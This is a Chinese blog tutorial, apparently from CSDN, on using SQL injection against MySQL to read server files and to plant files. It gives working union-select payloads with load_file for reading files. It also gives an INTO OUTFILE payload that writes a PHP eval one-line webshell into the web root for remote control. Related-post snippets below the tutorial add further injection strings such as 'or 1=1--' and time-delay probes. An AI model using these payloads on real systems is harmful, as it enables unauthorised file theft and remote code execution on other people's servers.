利用SQL注入漏洞实现MySQL数据库读写文件

已于 2022-08-22 09:37:48 修改
阅读量609 收藏
点赞数
分类专栏: 渗透 文章标签: php sql注入 渗透测试 sql注入漏洞利用 利用SQL注入漏洞实习读写文件
于 2022-07-18 20:31:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/125858766
版权

前提必要条件

  • 需要数据库开启secure_file_priv 就是将secure_file_priv的值为空,不为空不充许写入webshell (默认不开启,需要修改mysql配置文件mysql.ini或者叫my.ini配置文件)
  • 需要知道远程目录
  • 需要远程目录有写权限
  • 需要mysql root权限

开启secure_file_priv 参数,操作看动图:
在这里插入图片描述

读取文件

读取文件肯定是要知道,文件路径的,不知道的话就找已公布的中间件配置文件地址等

union select 1,load_file('文件路径') -- bbq

例如读取虚拟机的 boot.ini 文件:

union select 1,load_file('c:\\boot.ini') -- bbq

操作看动图:
在这里插入图片描述

写入文件

一般就写一个菜刀之类的小马,然后用用菜刀连接

union select "木马语句",2 into outfile "上传服务器文件路径" -- bbq

例如:我写入一菜刀一句话小马 文件 到 C:\phpStudy\WWW\123.php 目录下

union select "<?php @eval($_POST['123']);?>",2 into outfile "C:\\phpStudy\\WWW\\123.php" -- bbq

操作看动图:

<?php @eval($_POST['123']);?> 菜刀一句话密码 123

在这里插入图片描述

常家壮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据库入侵方法
Aspstudy与你一起学习ASP ......
03-08 6973
一般的web server都要使用数据库来存储信息,几乎所有的网站都要用数据库。这样就存在着两种可能,一种是使用小型数据库,如aceess,一般就储存在本地。另一种是使用大型数据库,如SQL server,Oracle这时候一般就放在另一台机器上,然后通过ODBC来访问它。 由于页面经常需要查询各种信息,修改用户信息等操作,实质上就是和数据库打交道了。这样就给非法用户留下利用的机会了。 1.对本地
sql注入介绍
qq_51331767的博客
02-17 679
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。在原来的sql语句中插入payload,攻击者注入一段包含注释符的sql语句,将原来的语句的一部分注释,注释掉的部分语句不会被执行。即把sql命令插入到web的请求表单中,欺骗服务器,以此来获取服务器的数据和权限。把用户输入的数据当作代码执行。
SQL注入16】SQL漏洞利用读写文件
Fighting_hawk的博客
02-22 4256
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
SQLServer/MsSql注入漏洞步骤、使用方法
weixin_46928280的博客
07-20 4378
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤
[mysql][sql注入]读写文件
qq_37301470的博客
11-14 248
secure_file_priv 全局变量 mysql> show variables like "%secure_file%" -> ; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | NULL | +------------------+-------+ 1 row in set, 1 warning (0.00
SQL注入详解(主要针对MySQL)
Rockboy777的博客
08-09 452
权限不足时也受影响;join绕过,如:union select 1,2,3 -> union select from (select 1)a join (select 2) join (select 3)substr()和mid()使用from for,如substr(database() from 1 for 1)表示将字符串从1位置截取长度1,mid()同理。
mysql攻防之写入漏洞
weixin_30497527的博客
07-26 171
因为被别人利用mysql攻击,所以想在这里帮助大家提高一下自身mysql的安全。避免成为别人的肉鸡。 show global variables like '%secure%'; 如果是这样则黑客可以利用MySQL在系统注入文件。 在linux下这个是不给设置为null的,否则数据库启动不了。 我在这里直接设置成/dev/null 这样即使黑客要注入文件耶没有用。 编辑my.c...
sql注入之高权限注入和文件读写
小阿宁的猫猫
09-12 714
高权限注入-- 1.多个网站共享mysql服务器-- 2.MySQL 权限介绍-- 3.注入流程-- 查询所有数据库名称-- 查询表名对应的字段名-- 查询数据-- 文件读写-- 1.文件读写注入的原理-- 2.文件读写注入的条件-- 3.读取文件-- 4.写入文件--
SQL注入漏洞攻击、数据库导入导出[从txt中导入导出]
zhanglan478950的专栏
11-27 1318
1.SQL注入漏洞攻击 protected void Button1_Click(object sender, EventArgs e) { string constr = "data source=pc-20120907sdqu;initial catalog=shool;user id=sa;password=admin"; usi
利用SQL注入漏洞登录后台的实现方法
12-15
早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。 如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞。但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的...
SQL注入漏洞发现和数据库监控系统.zip
最新发布
05-27
MySQLMTOP数据库监控系统.zip SQL注入漏洞发现及修补技术.zip
利用mycat实现mysql数据库读写分离的示例
12-15
支持事务、ACID、可以替代MySQL的加强版数据库 一个可以视为MySQL集群的企业级数据库,用来替代昂贵的Oracle集群 一个融合内存缓存技术、NoSQL技术、HDFS大数据的新型SQL Server 结合传统数据库和新型分布式数据...
利用SQL注入漏洞的方法
12-15
想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞 同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。 在数据库中建立一张表: 代码如下: CREATE TABLE `article` ( `articleid`...
四六级词sql文件版可以直接导入mysql数据库
02-25
这个sql文件是我之前自己将四六级单词导入mysql数据库后,又将其导出来的sql文件,希望可以帮助到到家,免得大家再去重新导入了~~~
sql 注入读写文件
yuan_boss的博客
08-24 451
获取到用户为root,主机为localhost,然后将这两个信息作为条件,接下来查看是否有文件读写权限。与当前mysql用户具有File_priv权限之外,还要确保当前系统用户具有访问hosts文件的权限。根据结果可知,当前mysql用户为root,主机为名为localhost。要想复现sql注入读写,首先mysql就需要满足下面的条件。想要读取某个文件,除了需要需要关闭mysql中的安全选项。本次实战,以sqli_labs靶场的第1关为例。发现读取成功,看到了hosts文件的内容。通过联合注入的方式,
SQL注入-文件读写文件的读取+写入:函数、使用方法
05-30 8621
SQL注入文件读写
SQL注入
weixin_47193338的博客
03-21 1726
一、介绍、原理 SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现数据库的任意操作。 SQL注入漏洞的产生需要满足以下两个条件: 1、参数用户可控:前端传给后端的参数内容是用户可以控制的。 2、参数带入数据库查询:传入的参数拼接到SQL语句,并且带入数据库查询。 二、MySQL查询语句 1、在不知道任何条件时: Select(要查询的字段名)from(名.表名) 2、在知道一条已
SQL注入读写文件
weixin_43765321的博客
03-02 3629
1. 读写文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件可读。 文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
Mysql注入读写文件
m_de_g的博客
11-30 3382
1.Mysql注入读文件 MySQL数据库渗透测试过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)。 读取前提: 1.用户权限足够高,尽量具有root权限。 2.secure_file_priv不为NULL。 修改mysql.ini的配置 可以看到里面secure_file_priv =的配置语句,如果没有的看到配置文件的话,需要添加上 2.Mysql注入写文件 3.写入Webshell 4.Sqlmap安全测试 ...
sql手工注入漏洞测试(mysql数据库)
06-28
### 回答1: SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要谨慎操作,避免对系统造成不必要的损害。 ### 回答2: SQL注入是一种常见的Web安全问题。手工注入漏洞测试是指通过手动输入恶意代码和查询语句来检测数据库使用SQL语言的Web应用程序中的SQL注入漏洞MySQL是一种广泛使用的关系型数据库,常用于开发Web应用程序。在手工注入漏洞测试mysql数据库时,需要按照以下步骤进行: 1.确定数据输入点:首先需要确定应用程序的哪些输入点与数据存储在mysql数据库中,包括表单、页面参数、Cookie等。 2.构造查询语句:通过使用常见的SQL语句操作符如SELECT、INSERT、UPDATE、DELETE、FROM等来构造查询语句。 3.注入恶意代码:通过向查询语句中添加恶意代码来尝试绕过应用程序的安全检测措施,如添加单引号、尝试注入逻辑运算符等。 4.验证漏洞利用注入所添加的代码来验证是否存在漏洞,如出现错误信息、显示数据库信息、登录成功等。 5.利用漏洞:如果存在漏洞,可以通过利用注入的恶意代码执行恶意操作,如删除或修改数据库中的记录、获取敏感数据等。 为了避免手工注入漏洞测试mysql数据库时可能造成的安全隐患,应遵守以下安全措施: 1.遵循最小权限原则,只为测试者授予尽可能少的权限。 2.使用测试环境,不要在生产环境中进行注入测试。 3.备份数据库,以便在发生注入攻击时恢复数据。 4.使用专业的安全测试工具进行测试,测试后删除所有测试数据。 通过手工注入漏洞测试mysql数据库,可以发现并修复SQL注入漏洞,提高Web应用程序的安全性。 ### 回答3: SQL手工注入漏洞是一种常见的漏洞,它允许攻击者利用可疑的输入向数据库发送恶意代码。MySQL是一种受广泛使用的关系数据库管理系统,虽然它提供了多种安全性功能,但仍然可能受到SQL手工注入攻击。 在测试SQL手工注入漏洞之前,我们需要了解如何识别这种漏洞。通常,我们看到以下迹象表明可能存在SQL注入漏洞: 1.在输入字段中注入特定的字符,例如单引号、双引号、括号等。 2.如果发送的请求返回了未知错误或异常结果。 3.能够看到不该出现在页面上的数据,例如数据库错误会返回PDOException. 测试步骤如下: 1.了解数据库结构,以便确认注入目标。我们需要知道要查询的表或字段。 2.利用输入字段尝试注入代码,例如: a.输入单引号测试SQL注入:输入'或1=1--,如果页面没有崩溃,那么它很可能存在SQL注入漏洞。 b.输入union测试SQL注入:输入1' union select 1,2,3,4,5#,如果页面返回了这些数字,则漏洞很可能存在。 c.使用等待语句测试SQL注入:例如,输入1; waitfor delay '0:0:10'; --等待10秒钟,看是否有延迟。 3.测试其他注入语句,例如联合查询、嵌套查询、子查询等,来获得受攻击的目标。 4.通过分析返回数据或页面上所显示的任何异常信息来确定是否存在漏洞。如果数据很容易被修改或者异常信息明显且无法解释,则很可能存在漏洞。 在SQL手工注入漏洞测试过程中,我们需要格外小心,因为数据库中的数据可能是非常敏感的。测试过程应当只进行在特定环境下,并应该遵循公司安全政策。通过识别和修复SQL注入漏洞,可以大大提高应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值